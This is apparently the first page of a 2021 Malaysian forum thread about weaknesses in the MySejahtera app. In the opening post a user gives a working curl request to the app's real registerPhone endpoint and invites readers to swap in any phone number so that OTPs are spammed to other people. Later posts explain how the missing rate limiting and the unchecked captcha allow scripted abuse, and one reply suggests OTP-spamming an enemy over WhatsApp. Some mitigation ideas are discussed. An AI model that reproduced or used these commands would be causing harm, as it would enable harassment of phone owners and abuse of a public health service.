Welcome Guest ( Log In | Register )

4 Pages  1 2 3 > » Bottom

Outline · [ Standard ] · Linear+

 MySejahtera Not So Sejahtera, Full of Exploits

views
     
TSDarkripper
post Oct 18 2021, 01:51 PM, updated 4y ago

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Window user pandai pandai tukar la )

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

imin
post Oct 18 2021, 02:04 PM

Enthusiast
*****
Senior Member
815 posts

Joined: Jan 2003
I'm not testing if this really work, but if it is, then the backend looks like it's developed by some intern IT student
DarkAeon
post Oct 18 2021, 02:06 PM

Enthusiast
*****
Senior Member
766 posts

Joined: Nov 2010
QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing if this really work, but if it is, then the backend looks like it's developed by some intern IT student
*
70 mil yo
moonsatelite
post Oct 18 2021, 02:07 PM

Enthusiast
*****
Junior Member
733 posts

Joined: Mar 2016
Which is why my friend uses a throwaway email as MySejahtera ID
kidmad
post Oct 18 2021, 02:08 PM

Look at all my stars!!
*******
Senior Member
4,430 posts

Joined: Jul 2005
this api should not even be exposed! it's supposed to be called by a backend module! ..
Doomsday
post Oct 18 2021, 02:11 PM

keluarpattern dupe slayer
*******
Senior Member
2,485 posts

Joined: Dec 2004
From: initrd


mafioso yuno do properly backend
WaCKy-Angel
post Oct 18 2021, 02:12 PM

PeACe~~
*********
All Stars
21,785 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 01:51 PM)
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at terminal of choice and change contact number (Window user pandai pandai tukar la )

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

*
do u even need exploit?

ayam thought u can just try login with the number and the app will send otp?
TSDarkripper
post Oct 18 2021, 02:13 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing if this really work, but if it is, then the backend looks like it's developed by some intern IT student
*
Go ahead and try, the URL is legit anyways. Can use Postman or other tools as well, as long as you send that form-data, it works. These mistake are worse than interns lol.

QUOTE(kidmad @ Oct 18 2021, 02:08 PM)
this api should not even be exposed! it's supposed to be called by a backend module! ..
*
They kinda forget to verify the captcha actually. They have Captcha at the page, but backend doesn't verify that token.
WaCKy-Angel
post Oct 18 2021, 02:14 PM

PeACe~~
*********
All Stars
21,785 posts

Joined: Dec 2004
From: KL



QUOTE(imin @ Oct 18 2021, 02:04 PM)
I'm not testing if this really work, but if it is, then the backend looks like it's developed by some intern IT student
*
What do u expect when it is already doing what it is supposed to do?

Do u know u can also do similar spam otp with whatsapp?

get ur enemy whatsapp phone number and try login with the number..that person will keep getting otp spam to his phone.
TSDarkripper
post Oct 18 2021, 02:15 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:12 PM)
do u even need exploit?

ayam thought u can just try login with the number and the app will send otp?
*
There are no rate limit, meaning you can repeatedly keep on request OTP with a simple scripts.

Triggering OTP is not the issue, the issue is lack of Authentication/Authorization token. Maybe that's the implementor have the same thought as you.

Also, the OTP token never change, at least for the past 19 hours that i had been spamming myself.

This post has been edited by Darkripper: Oct 18 2021, 02:16 PM
ShadowR1
post Oct 18 2021, 02:23 PM

Im still HeRe ...
******
Senior Member
1,793 posts

Joined: Jan 2007
From: The Long river ...


Its a 70mil feature la ...
kidmad
post Oct 18 2021, 02:23 PM

Look at all my stars!!
*******
Senior Member
4,430 posts

Joined: Jul 2005
QUOTE(Darkripper @ Oct 18 2021, 02:13 PM)
Go ahead and try, the URL is legit anyways. Can use Postman or other tools as well, as long as you send that form-data, it works. These mistake are worse than interns lol.
They kinda forget to verify the captcha actually. They have Captcha at the page, but backend doesn't verify that token.
*
to send notification they can just use something like big ip f5 to whitelist only allowed IP address could access the endpoints. infact just build the service separate and segregation between internal and external network.
WaCKy-Angel
post Oct 18 2021, 02:24 PM

PeACe~~
*********
All Stars
21,785 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:15 PM)
There are no rate limit, meaning you can repeatedly keep on request OTP with a simple scripts.

Triggering OTP is not the issue, the issue is lack of Authentication/Authorization token. Maybe that's the implementor have the same thought as you.

Also, the OTP token never change, at least for the past 19 hours that i had been spamming myself.
*
A simple captcha will not be sufficient to block hacker.

Anyway security vs convenient has always been a mouse and cat game. The more u do the more hacker wants to find exploit lol.
TSDarkripper
post Oct 18 2021, 02:27 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(kidmad @ Oct 18 2021, 02:23 PM)
to send notification they can just use something like big ip f5 to whitelist only allowed IP address could access the endpoints. infact just build the service separate and segregation between internal and external network.
*
They can't do that, as that's the endpoint that client side is calling to trigger it. Eaiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.

QUOTE(WaCKy-Angel @ Oct 18 2021, 02:24 PM)
A simple captcha will not be sufficient to block hacker.

Anyway security vs convenient has always been a mouse and cat game. The more u do the more hacker wants to find exploit lol.
*
It wont solve all, but it reduces the exposure.
jmas
post Oct 18 2021, 02:29 PM

Enthusiast
*****
Junior Member
791 posts

Joined: Mar 2010
QUOTE(DarkAeon @ Oct 18 2021, 02:06 PM)
70 mil yo
*
i tot already debunked that 70mil does not include mysejahtera?
kons
post Oct 18 2021, 02:32 PM

Конс
Group Icon
Moderator
6,161 posts

Joined: Oct 2004



tengine webserver...

twitter bootstrap.. google font api... owl carousel.. jquery...

all free stuff but cost 70m... thanks to our competent gomen.
WaCKy-Angel
post Oct 18 2021, 02:34 PM

PeACe~~
*********
All Stars
21,785 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:27 PM)
They can't do that, as that's the endpoint that client side is calling to trigger it. Eaiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.
It wont solve all, but it reduces the exposure.
*
iinm mysejahtera was developed merely for check-in purposes but now has become more important.
ofcourse security wise is not top priority back then.

Why not u tweet KJ about this and see what actions he will take?
TSDarkripper
post Oct 18 2021, 02:37 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(jmas @ Oct 18 2021, 02:29 PM)
i tot already debunked that 70mil does not include mysejahtera?
*
Cost is not the question here. This is a critical app required by most residents in Malaysia, cannot compromise on security yo. Imagine a data-breach?


QUOTE(kons @ Oct 18 2021, 02:32 PM)
tengine webserver...

twitter bootstrap.. google font api... owl carousel.. jquery...

all free stuff but cost 70m... thanks to our competent gomen.
*
I see you're man of culture here. Jquery hurts my eye tho.
TSDarkripper
post Oct 18 2021, 02:37 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(WaCKy-Angel @ Oct 18 2021, 02:34 PM)
iinm mysejahtera was developed merely for check-in purposes but now has become more important.
ofcourse security wise is not top priority back then.

Why not u tweet KJ about this and see what actions he will take?
*
tweeted, still no news yet. So yeah
WaCKy-Angel
post Oct 18 2021, 02:38 PM

PeACe~~
*********
All Stars
21,785 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 02:37 PM)
tweeted, still no news yet. So yeah
*
slowly lah wait he think of a good cum back like dajjal hahahaha

who knows later he will employ u as their Security consultant eh

4 Pages  1 2 3 > » Top
 

Change to:
| Lo-Fi Version
0.0169sec    0.42    5 queries    GZIP Disabled
Time is now: 9th November 2024 - 10:01 PM